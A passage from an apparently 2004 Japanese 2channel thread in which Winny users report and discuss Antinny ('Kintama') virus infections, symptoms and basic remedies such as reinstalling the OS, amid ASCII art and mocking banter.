￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 ∧＿∧ 　 ∧＿∧ 　　　なんだと
　（@益@∩）（★＿★）　　　　
　（つ　　丿（　　⊂）　なんだと
　（　ヽノ　　ヽ/　　）　　　
　し（＿）　　（＿）Ｊ　　　なんだと
261 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 20:58:55 ID:vOHyvMw3]: >>260
何よその顔文字？ふｚ（ｒｙ
262 名前：[名無し]さん(bin+cue).rar [04/09/18 21:08:03 ID:AsLaVTFg]: 糞スレ万歳。
263 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 21:54:11 ID:T0VDuWXt]: このスレの存在意義はテンプレと亜種の報告ぐらい
「感染したんだけど、どうすればいい？」なんて聞かれても
再インスコとしか答えらんねえし
264 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 22:00:29 ID:hzPBJ0QF]: とりあえずおろおろしとけとしか言いようがないよな
265 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 22:45:24 ID:oNqwH7kJ]: んだな
ＰＣ環境かいたり症状書いたりして対処方法聞くのはわかるが
感染したんだけど、どうすればいい？
とか答えようない
266 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 22:45:35 ID:a8Xne7kS]: 　ヽ(・ω・)/　　ｽﾞｺｰ
＼(.＼ノ
267 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 22:57:22 ID:mt3AgFOP]: なにマジメに糞スレとかいってんだよ。

このスレはウイルスにかかったやつを見て、馬鹿だなぁ～とか、見て楽しむスレだよ。
268 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 23:01:43 ID:Nip6NdZR]: >>267
正解。
269 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 23:12:32 ID:mt3AgFOP]: >>268
おれも、自分がヌルポースを踏むまでそうおもてたよ。
しかしな・・・、そうオレが馬鹿だったんだ。

お前らも注意しろよ。

ってのも、楽しむスレでもあるんだよ
270 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 23:14:48 ID:JZaY3Lu3]: 糞というより、
専門知識の無い厨房が答えられなくて煽るスレだろ。
解決方法など、ここで聞く方が愚か。
専門知識はセキュリティスレに聞けと。
271 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 23:20:51 ID:HPvW3N9F]: 2ちゃんって良くも悪くも普通の人が集まるところなんだなと思う
272 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 23:41:01 ID:gYO8D+ez]: 昨日のアゲ嵐が潜伏してるのかしらね
273 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 23:42:44 ID:vOHyvMw3]: 毎晩ここを酒のつまみにしている。

>>270
> 専門知識の無い厨房が答えられなくて煽るスレだろ。
スレタイ100回音読して、書き込む前にﾏﾏﾝにこれで良いかを聞いてから書き込め。
274 名前：↑ [04/09/19 00:00:28 ID:Bx3aTSht]: あらら、見事に>>２７０の言うままの
厨房あおりレスｗ

多少皮肉っぽいが、>>270と>>271の
言ってることに同意
275 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 00:18:24 ID:WdqXQNJH]: つーかほんとに解決したかったらsymantecにでも行けって話ですよ。
専門家でもないのに感染したことのないウィルスの事なんか
知るかってーの。
276 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 00:19:03 ID:JtjLyOZd]: セキュ板にいって質問したら「この割れ厨が！　ﾀﾞｳｿ板に還れ」
で終わるような希ガス　
277 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 00:35:20 ID:Aq2R3Mcx]: んでもって、この板にも超がつく位のエキスパートも居ないわけじゃないんだけど、
そんな連中はこんなスレで親切にはしてくれないんだ。

そりゃまあ、開発側のスタッフなんだから仕方がない。あきらめたら？
278 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 00:59:42 ID:oFUPut4A]: >>277
そうだよな、ウイルス製造側が新しいのが引っかかったのをみて、
俺のだって、笑ってそう。
ああいうの作るやつは、注目されたくて作るところがありそうだから。
279 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 01:01:06 ID:WdqXQNJH]: 質問テンプレを感染ウィルス報告テンプレに改名するのはどうだろう。
280 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 01:02:39 ID:wfsjdt9U]: 正直、ウィルス対策に専門知識なんてほとんど関係ない
虫を解析するわけじゃないし

情報のアンテナ広げるスレだし

虫の専門知識？それはそれでいやだな
281 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 01:16:30 ID:2kFGdqSe]: 血飛沫ぬるぽのﾃﾝﾌﾟﾚ追加きぼんぬ。

…今、致死武器ぬるぽと出た…。
確かにPCが死に至る武器だが…。
282 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 01:21:56 ID:ItkA5NVA]: >>281
新種じゃないだろ？今までのとなんか違うのか？
だったらテンプレで症状あげてみ
283 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 01:27:11 ID:ItkA5NVA]: shareの方では新種がでてるようだが、やっぱりスレ違い？
284 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 01:29:48 ID:2kFGdqSe]: >>282
新種つーか、亜種だろ。
ﾃﾝﾌﾟﾚのどこにも、血飛沫とか、女性の悲鳴とか、
血文字ぬるぽとか、ﾌｧｲﾙを拡張子でﾗﾝﾀﾞﾑに削除なんて書いてあんだよ。
285 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 01:29:52 ID:ItkA5NVA]: スマン、違った。
だたのスクリプトですか
286 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 02:04:12 ID:jqJIBzts]: >>281のはｽｸﾘｰﾝｾｰﾊﾞｰの亜種じゃないの。
出始めた当時にもそのﾊﾟﾀｰﾝ報告もあった気がする。
287 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 02:15:27 ID:lmFEnXHd]: >>284
それはただのキンタマだろ？
288 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 02:22:07 ID:DmoEK/0L]: ｶﾞｯ
289 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 02:23:36 ID:MWTG7w0F]: >>281
血しぶきが確かに画面の一部に出ていた
が、ほって置いた。
しばらく、１５分ぐらい手元を離れて戻ってみると、画面全体が血とぬるぽ文字のスクリーンセーバーで覆われていた。
で、すぐにj重要なファイルのいくつがが見つからない旨の警告がでたが、システム入れ替え予定があったので、ほって置いた。
とりあえず、再起動したが立ち上がらなくなった。HDフォーマットされる。
290 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 02:35:34 ID:ewrk9kPh]: 今更感染したのかい
それだけの症状でてるのに放置してたんだからどうしようもない
諦めがついてよかったじゃないか
291 名前：289 mailto:sage [04/09/19 02:41:52 ID:MWTG7w0F]: ＞290
日本語文理解できてますか？
292 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 02:43:38 ID:AnuRBtiP]: 俺には明かな症状が出てるPCを放置する>>289の心境が判らない

ま、肴にはなるがな
293 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 02:44:53 ID:Fz0Pi/GH]: 　　　　|┃三　　　　,ｨ, (fー--─‐- ､、
　　　　|┃.　　 ,ｲ/〃　　　　　　　　ヾ= 、
　　　　|┃　　 N ｛　　　　　　　　　　＼
　　　　|┃　ﾄ.l ヽ　　　　　　　　　　　　　　 l
　ｶﾞﾗｯ.|┃　､ゝ丶　　　　　　 ,..ｨ从　　　　|
　　　　|┃　＼`.、_　　 _,. _彡'ﾉﾘ__,.ゝ、　 |　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　|┃三　｀ゞf‐＞ｎ;ﾊ二r^ｧｎj＜ y=ﾚヽ　　　＜　　話は聞かせてもらったぞ！
　　　　|┃.　　　 |fjl、｀￣ﾘj＾ヾ) ￣´　ﾉﾚﾘ　　　　 |　　　人類は滅亡する！
　　　　|┃三　　ヾl.`ｰ- べｌ,- ｀ｰ-‐'　 ,ン　　　　　＼＿＿＿＿＿＿＿＿＿＿＿＿
　　　　|┃　　　　　 l 　　 r─‐-､　　　/:|
　　　　|┃三　　　　ﾄ､　　｀二¨´　　,.ｲ　|
　　　　|┃　　　　　_亅::ヽ、　　　 .／　i　:ﾄ､
294 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 03:09:50 ID:WdqXQNJH]: な（ｒｙ
295 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 03:14:35 ID:2kFGdqSe]: >>287
駄目だこりゃ┐(´д｀)┌ ﾔﾚﾔﾚ
296 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 03:32:57 ID:bNeuQHMh]: >>295
何がﾔﾚﾔﾚだか知らんが感染方法が変わってない以上
いちいちテンプレに載せる必要はないと思う
297 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 03:42:43 ID:2kFGdqSe]: >>296
感染方法が変わってなくても、症状違うだろ。
おまいの中では、ﾌｧｲﾙ流出とﾌｧｲﾙ破壊(削除)はｲｺｰﾙなのか？
298 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 03:51:57 ID:WdqXQNJH]: もういいじゃんなんでも。
地雷を踏んだらさようならだ。
黙って再インストールしろよ。
299 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 03:55:29 ID:b0B7ZDFC]: ウィルス踏んだ奴を藁うためのｸｿｽﾚらしいから、
有益な情報天ぷら追加なんかありえねーって話なんだろ。

ここより、ﾀﾞﾎﾞｰｸﾘｯｸｽﾚの方がﾏｼだなw
300 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 04:24:28 ID:WdqXQNJH]: 地雷を踏んだらさようなら
ってフレーズを使いたかっただけなんだけどな。
301 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 04:29:40 ID:AnuRBtiP]: ファイル破壊はAntinny.Aから標準装備なんじゃねーの？
初期の頃、どっかのスレで解析屋が警告してたハズだが

少なくともAntinny.G以降は流出＆破壊がデフォなんだから、
症状は概ねイコールだと思うんだが

踏んだこと無いからよー知らんけど
302 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 05:12:24 ID:I0wY0eJ8]: ファイル流出して再インスコするんだ
(　´,_ゝ｀)ﾌﾟｯ
303 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 07:22:08 ID:ewrk9kPh]: テンプレが不満なら>>297がテンプレ案をつくってみればいい

キンタマはもう枯れてて、新しくできた亜種でもなくキンタマの典型的な症状なので
今更テンプレ変更の必要を感じなかっただけだ

いいテンプレ案出せばそれを使えばいいだけの話だし、どんどん出してくれてかまわんよ
304 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 09:56:33 ID:oB2+7fit]: キンタマにかんせんしてしまいました。　
再インスコのやり方がよくわからないんですが
初心者は店とかで頼んだ方が安全ですかね？
305 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 10:07:59 ID:oB2+7fit]: 変換し忘れて釣りっぽくなってしまった・・
スマソ
306 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 10:24:34 ID:7VmS7fzT]: >>304
PC初心者
pc6.2ch.net/pcqa/
307 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 10:28:53 ID:SaANs3iW]: _________________________
　　　　＜○ノ
　　　　　∥　
　　　　くく
ヤバいぞ！このスレは崩壊する！
オレが止めているうちに他スレへ逃げろ！
早く！早く！オレに構わず逃げろ！
308 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 11:04:21 ID:I0wY0eJ8]: 最近ny始めて
一週間ほどお試しノートン先生無しでやってたら
Antinnyとかが合計6個見ﾂｶｯﾀ━━（ﾟ∀ﾟ）━━
309 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 11:07:24 ID:wfsjdt9U]: >>308
楽しそうだな、オイ
310 名前：[名無し]さん(bin+cue).rar [04/09/19 11:09:08 ID:AsaGSluL]: >308
がんがれＹＯ！
311 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 11:28:21 ID:I0wY0eJ8]: ここで問題なのは、
>>302に「ｳｨﾙｽに感染するなんてｱﾌｫだな。」
とか、考えながら煽ってる俺が居ることだ。

　　　　　　　　　　ヽ●ノ　　ｳﾋｮｰｰｰ！！
　　　　　　　　　　/
　　　　　　　　　ノゝ
312 名前：[名無し]さん(bin+cue).rar [04/09/19 13:18:42 ID:akFkQzzd]: >>308ﾀﾞﾎﾞｰｸﾘｯｸスレに相応しい人材ﾊｹｰﾝ！！
313 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 13:58:41 ID:LDCKOO6F]: >>307
バカ野郎！お前をおいていける訳ねえだろ！
314 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 14:10:58 ID:X3LHpMAQ]: >>307
そお？　悪いね、じゃ。(・∀・)ﾉｼ
315 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 14:14:09 ID:+PHRbRxu]: _________________________
316 名前：[名無し]さん(bin+cue).rar [04/09/19 14:16:03 ID:J0kQ+dpj]: もういい
317 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 14:19:17 ID:c7bdOKz4]: 質問してくるのはいいが、回答者が
「テンプレ嫁・フォーマット使わせろ」って言わなくなってきたのが問題かもな。
318 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 14:22:03 ID:hy/B0GCt]: つーかこのスレは作者が（・∀・）ﾆﾔﾆﾔするためのスレでもある。
そうに違いない。
319 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 14:50:56 ID:k+UHX8l3]: すいません、うっかりfolder拡張子クリックしてしまったんですが
再起動してないんで今できること教えて欲しいです。
【使用OS】XP Home
【WindowsUpdateしてるか】SP以外
【AntiVirusは】Norton
【ちゃんとUpdateしてるか】最新版です
【スキャンした結果】反応なし
320 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 14:51:33 ID:WdqXQNJH]: 「テンプレ嫁・フォーマット使わせろ」
321 名前：319 mailto:sage [04/09/19 14:55:52 ID:k+UHX8l3]: えっと、再起動前なのでって事なのですが…
再起動してなくても症状はでますか？
322 名前：[名無し]さん(bin+cue).rar [04/09/19 15:14:38 ID:+tu19zN+]: >>319
もうない
323 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 15:29:43 ID:C5wzmSxL]: ていうか.folder単体では何も出来ないぞ
324 名前：319 mailto:sage [04/09/19 15:38:14 ID:k+UHX8l3]: 解凍したフォルダの中に同フォルダへリンクしてる.folderというのがありまして、
キンタマウイルスじゃないか、と思って質問しました。
再起動前ではいずれの症状も出ていませんが…
325 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 15:40:37 ID:waEywyBB]: キンタマなら、ノートンで余裕で除去できるべなもし。
326 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 15:53:54 ID:k+UHX8l3]: >>325
ありがとうございます、現在検索中です。
検出されなかったら未感染ってことですかね。
327 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 15:59:54 ID:mNBULGYJ]: DaemonToolsの自動起動って切れませんか？
凄い怖いんですけど、これ
328 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 16:17:36 ID:knV/qYFP]: >>327
板違い
329 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 18:35:45 ID:DxZhOzQ8]: tmp4.2ch.net/test/read.cgi/download/1095299769/190

nyじゃないけど、shareのウイルスって報告した方がいいの？
330 名前：[名無し]さん(bin+cue).rar [04/09/19 19:14:33 ID:cgXSiKT9]: NYで落としたEXCELのゴミファイル間違えて開いたのが原因と思われるウイルスに
感染してセーフモードですらd346.busの読み込みに失敗し起動すらしない状態です。
通常起動時はブルーバックで英語でウイルスに感染してるからディスクチェックする
か新しいHDDにしろみたいな画面でストップ。ちなみにOS再インストも不可。
ちなみに感染ファイルの内容は自衛隊の一日のスケジュールみたいなもの。
有名なウイルスかどうかと対処方有れば教えてください
331 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 19:21:17 ID:c7bdOKz4]: >>330
OSインストール時にフォーマットするしかないんじゃない？
332 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 19:32:58 ID:wfsjdt9U]: >>327
切れるよ
OSの問題なのでぐぐれ
333 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 20:08:51 ID:MCWvo/8d]: >>329
報告不要だろ、だってここｎｙのスレだから。
334 名前：[名無し]さん(bin+cue).rar [04/09/19 20:18:39 ID:Tt0cd+Jp]: 先ほどシステムが故障してXPを再インストールしたのですが、
保存していたテキストファイルやワードファイルを開くとすべて２７７KBの
　 ∧＿∧
　（　´∀｀）＜　ぬるぽ

になっていました。これはもう直らないのでしょうか？
ファイルのプロパティだけ見ると、容量分の数字は表示されるのですが、
開くと全部ぬるぽです。
335 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 20:19:23 ID:RH/I0MfQ]: >２７７KBの　 ∧＿∧
>　　　　　　　（　´∀｀）＜　ぬるぽ

余程でかいAAなんだろうな
336 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 20:21:42 ID:MCWvo/8d]: >>334
あきらめて、OSクリーンインストしろ。
337 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 20:36:39 ID:pAdpWkD6]: >>327
テンプレに自動実行の切り方が載ってる。
338 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 20:50:22 ID:AnuRBtiP]: 全角age厨にマジレスすんのもアレだが

>>334
諦めれ
339 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 21:02:20 ID:hy/B0GCt]: >>327
当然もう解決しただろうけど一応。
仮想ドライブだろうと実ドライブだろうと、Autorunの切り方は同じですから。天ぷら参照。

>>330
それって自衛隊流出ファイルをまとめたと見せかけたただの偽ファイルじゃないか？
エクセルのアイコンをしたexeだったらそれ。
Autorun＋batのやつと同じでレジストリ＆Cドラ全削除とかされるやつがあった希ガス。
340 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 21:44:12 ID:dib5hncW]: 映画】エッチの国のアリス (日本語字幕).avi632e8f0a4691369457d465e5921f15c5
こいつが入っているフォルダ開くとexplorerのCPU占有率99%になる。なんで？
341 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 22:10:11 ID:XDHI+ZVl]: >>340
それはexplorerの素敵な仕様だからでは？
CPU100%状態だとファイル自体、捨てられないし・・・
コマンドプロンプトで捨てられるんだっけ？
342 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 22:11:31 ID:c7bdOKz4]: >>341
捨てられないよ。止まるの待つしかない。
343 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 22:18:09 ID:WdqXQNJH]: タスクマネジャーのプロセスで終了させてまた起動させればいい
344 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 22:20:55 ID:dib5hncW]: 応答なしで強制終了　別のファイラーで捨てました。そしたら　直ったｗ・・・・なんだったんだろう？？
345 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 23:20:23 ID:kUL3WDzN]: explorerがaviの情報を必死に取得しようとしてるだけ
346 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/19 23:57:06 ID:DmdpP6EI]: daemonの話題はスレ違いだって言ってんだろカス共。
お前らも質問者と同じでテンプレ読んで100年ROMれ
347 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 00:13:46 ID:3C8RVaA7]: テンプレにも載ってるし、ウイルス対策としては初歩の初歩。
実のある報告をするために必要な措置だし、このくらいのことで煽るの
はどうかと。

まあ、テンプレも熟読せずに質問する厨房が諸悪の根源だがな。
348 名前：[名無し]さん(bin+cue).rar [04/09/20 00:39:46 ID:4KTwK7jG]: 外見上は生きている物が魂を持っているかという疑惑
反対に、魂を持った者が本当に生きているのかという疑惑

完全なハードウェアを装備したOSという幻想こそが諸悪の根源なんだよ
349 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 00:42:05 ID:SiszVWzf]: ageるお前が諸悪の根元
350 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 01:01:45 ID:zwYNkIdi]: >>329
こんなの実行したやつがあんなにいるのか？
351 名前：[名無し]さん(bin+cue).rar [04/09/20 01:57:55 ID:p7IRQdo2]: やっべなにこれ
　　　　　　　　　　　　/ヽ　　　　　　 /ヽ
　　　　　　　　　　　　/　ヽ　　　　　 /　ヽ
　　＿＿＿＿＿＿ /U　ヽ＿＿＿/　　ヽ
　　|　＿＿＿＿　／　　　U　　　　:::::::::::U:＼
　　| |　　　　　　 /／＿__　　　＼　　::::::::::::::|
　　| |キンタマ　　 |　　|　　 |　　　　　U :::::::::::::|
　　| |　　　　　　.|U　|　　　|　　　　　　::::::U::::|
　　| |　　　　　　 |　├―-┤　U.....:::::::::::::::::::/
　　| |＿＿＿＿　ヽ　　　　　.....:::::::::::::::::::::::<
　 └＿＿＿／￣￣　　　　　　:::::::::::::::::::::::::|
　　|＼　　　 |　　　　　　　　　　　:::::::::::::::::::::::|
　　＼＼　＼＿＿＿　　　　　 ::::::
352 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 04:03:48 ID:xXZda9FS]: ◆◆SHAREウイルス発生[ Safe Share ver0.2 ] ◆◆
news13.2ch.net/test/read.cgi/news/1095607197/

あっちにもスレ建ったな。
353 名前：[名無し]さん(bin+cue).rar [04/09/20 13:34:18 ID:01dHSg1r]: キンタマ感染しても、ポート警告が多い等の理由でポート０設定にしてたら個人情報は流出しないのでしょうか。どなたか教えてください。
354 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 13:38:41 ID:UJu/s5IU]: 釣られてやんねーyo
355 名前：[名無し]さん(bin+cue).rar [04/09/20 13:52:59 ID:yI1sC6g8]: >>353
正解
あんた神だね。
356 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 14:04:06 ID:N2iAbA40]: 【GBA】(GBA　ツール)ポケットモンスタールビー＆サファイア　時間変更コード（詳しい説明付き）これでやっと夜がきます.zip
サイズ51.851　　2222a20a7e6851321f070b0c907a642d

上記をDLしてウイルスチェックしたのち、＋説明．txtファイル（exeは付いてませんでした）を
開いたのですが、開けないみたいなエラーが出たので、極窓で確認したら判別不能と出たので
PC全体のウイルスチェックをしたのち、PC再起動させWinnyを起動させたら
１秒もたたずに落ちてしまいました。何度やっても同じで、ノード情報は全て消えてしまいました。
それ以外の情報は平気でした。
上書きだけでは復旧できなくて再度Winnyを入れ直したのですが、ウイルスでしょうか？
他にもファイルがあったのですが、いじってません。
一応報告しておきます。
357 名前：[名無し]さん(bin+cue).rar [04/09/20 14:08:24 ID:01dHSg1r]: キンタマはUpFolder.txtを書き換えるけど
port設定までは変えないということですか。
358 名前：[名無し]さん(bin+cue).rar [04/09/20 14:18:37 ID:01dHSg1r]: UNTINNYウイルスに感染した場合、ポート０にすると、
他人にウイルスファイルをばらまかなくてすむのでしょうか。
359 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 14:31:12 ID:pZ2jUMD0]: tmp4.2ch.net/test/read.cgi/download/1095597120/98

マルチ乙>>358
360 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 14:57:33 ID:SiszVWzf]: 見ろ
不用意にageるから肴にすらならねー有象無象が寄ってきたじゃねーか
361 名前：[名無し]さん(bin+cue).rar [04/09/20 14:59:47 ID:01dHSg1r]: >>355
もう少し詳しく教えていただけませんか。
362 名前：47 mailto:age [04/09/20 16:40:28 ID:pmh0I04D]: 　　　　　　　　　　　　　　　　 _,,. -－-　,,_　
　　　　　　　　　　　　　,.-‐'''"　　　　　　　ヽ　
　　　　　　　　　　　　ﾉ　　　　　　　　　　　ヽ
　　　　　　　　　　　 /　　　　　　　　,,,_,_　　　　ヽ　
　　　　　　　　　　　 {　　,vﾘｊh!ﾘｊh!（　　　ヽ,　　　}
　　　　　　　　　　　 }　 / ,; ニ＝　　=ニﾐ;、i　　{
　　　　　　　　　　　 {　ｊ　　,.ｪｭ ,　｛ｒｔｪ、　i　ﾉ
　　　　　　　　　　　｛ Y　　　　　　ミ　　　Ｙﾘ
　　　　　　　　　　　！|　　　　y.-,_-)、　　　 |ﾉ　　　
　　　　　　　　　　　　'!　　ノ _, u　、ヽ　　!　　　　　
　　　　　　　　　　　　　!　　　　''ニ' '　　　　!　　
　　　　　　　　　　　　　ト、　　_,,,,,,　　　　ｲ　　　　　
┌─────┐　　 /| 　　－--　－'　 |ヽ,　
│　金子勇　 | ー'''{ 　| 　　　　ﾉ　　　 |　/''ー
├─────┴────────────────────────
│『AntiShare』の開発を要請する。
└──────────────────────────────
363 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 16:44:19 ID:joujhvUo]: ウイルスの鑑定などはここでいいのでしょうか？
できれば下記の鑑定をお願いします。

!!(一般コミック) [二ノ宮知子] のだめカンタービレ第04巻(別スキャン単頁).zip 28,205,885 ee32043b7fe7dd03f72b29052cc692a2

中身はこの漫画のJPEGファイルのほか、
「.exe」「ReadMe.html」「.folder」の三種のファイル。
UNTINNYでおなじみの組み合わせですが、当方のNortonSystemWorks2004が反応
しなかったので、新しい亜種ができたのかと。
（踏んでないので分かりませんが．．．）
また、JPEGファイルがシステムファイル扱いになっており、
フォルダオプションの「システムファイルを表示する」設定していないと見えませんでした。
364 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 16:45:02 ID:MjkRRq7r]: >>358
まるちかまあいいや
ぽと０にしても、UPしないというわけじゃない
普通は相手からセッション開始してUPするのだが
ｎｙのポト０は自分からセッション開始してUPするらしい

つまりポト０であろうが、うｐするから拡散する
ぽと０同士はだめだろうけど
365 名前：[名無し]さん(bin+cue).rar [04/09/20 18:05:43 ID:01dHSg1r]: >>364
ということは、ウイルスがポート設定まで
変えてしまうということですか。
366 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 18:20:10 ID:29BOiMd4]: >>365
要は、「キンタマ踏んだけど、私のデータ流失してませんよね？」ってことか？
367 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 18:23:05 ID:TyAT+7N1]: >>365
ウイルス関係なく
ポート0でもみんな普通にうｐしてるってこと
368 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 18:33:38 ID:gy//M/pW]: >356
よく意味がわからん
txtファイルらしきものが開けなかったということか？
テンプレの感染症状確認してみたか

>363
とりあえず捏造警告でも出しといてくれ
369 名前：[名無し]さん(bin+cue).rar [04/09/20 19:19:39 ID:01dHSg1r]: >>366､367
そうです。ポート０にしてても感染するとupするのですか。
また、感染してなくてもポート０で普通のスピードでupしてるのですか。
370 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 19:27:24 ID:oM44BT6y]: まぁageなくてもいいじゃないか
371 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 19:34:59 ID:gy//M/pW]: >369
うp速度ははｎｙ見て自分で確かめろ

つーか>>367読んだ？
ぽと０でも
感染とか関係無しにうpはしてると言ってるじゃねえか
372 名前：[名無し]さん(bin+cue).rar [04/09/20 19:52:54 ID:01dHSg1r]: 分かりました。ウイルスに関係なくupされるのですね。
では、感染してもポート０設定は解除されないのですか。
373 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 19:58:04 ID:ZhyfpYqT]: ぜんぜん話を聞いてねえな（w。
374 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 20:04:18 ID:X2VuaJN2]: 01dHSg1r
こいつ質問スレでも粘着して質問繰り返してるよ・・・・・
見事にスルー/放置されてこっちになだれ込んでるみたいだな・・・・・

スルー/放置することをお勧めする

by 総合質問スレ住人より
375 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 20:09:41 ID:6eHXzHXd]: 情報㌧クス
376 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 20:23:41 ID:gy//M/pW]: >372
そんな症状は無い
おまえがどのウィルスのことを言ってるのか知らんが
既出のantinnyにそのようなことをするものはない
そういう症状があってもそれは亜種であり
俺の知ったこっちゃ無い
377 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 20:30:08 ID:t5Flw/k8]: 771 名前：名無しさん：04/09/20 20:23:00
キンタマ感染しても、ポート警告が多い等の理由でポート０設定にしてたら個人情報は流出しないのでしょうか。
どなたか教えてください。

こんなん見つけました
378 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 20:30:19 ID:+pzCupw3]: 01dHSg1rは脳内が感染してる模様です。
379 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 20:32:28 ID:SiszVWzf]: sageも出来ん厨は放っとけ

どーせ後20日ぐらいの命なんだからｗ
380 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 21:58:26 ID:5G7BbgQX]: 　／|：： ┌──────┐ ：：|
　　/.　|：：｜　　　　　　　　　 |　：：|
　　|...　|：：｜　　キンタマ　 .|　：：|
　　|....　|：：｜　　　　　　　　｜：：|
　　|　　|：：　| 　　　　　　　　　 | ：： |
　　|....　|：： └──────┘ ：：|
　　＼_｜　　　 ┌────┐　　 .|　　　　 ∧∧
　　　　￣￣￣￣￣￣￣￣￣￣￣　　　 ( 　＿)
　　　　　　　　　　　　　／￣￣￣￣￣旦￣(_,　　）
　　　　　　　　　　　／　　　　　　　　　　　　　＼　｀
　　　　　　　　　　　|￣￣￣￣￣￣￣￣￣￣￣|、＿）
　　　　　　　　　　　￣|￣|￣￣￣￣￣￣|￣|￣

　　　　　|　　　　　　　　　　 .( (　　|＼
　　　　　| )　　　　　　　　　　) ) |　|　.|
　　　　　|＿＿＿＿＿＿＿＿(__|　.＼|
　　　／― 　　∧ ∧　　――-＼≒
　　／　　　　 ( 　　　)　　　　　　　＼
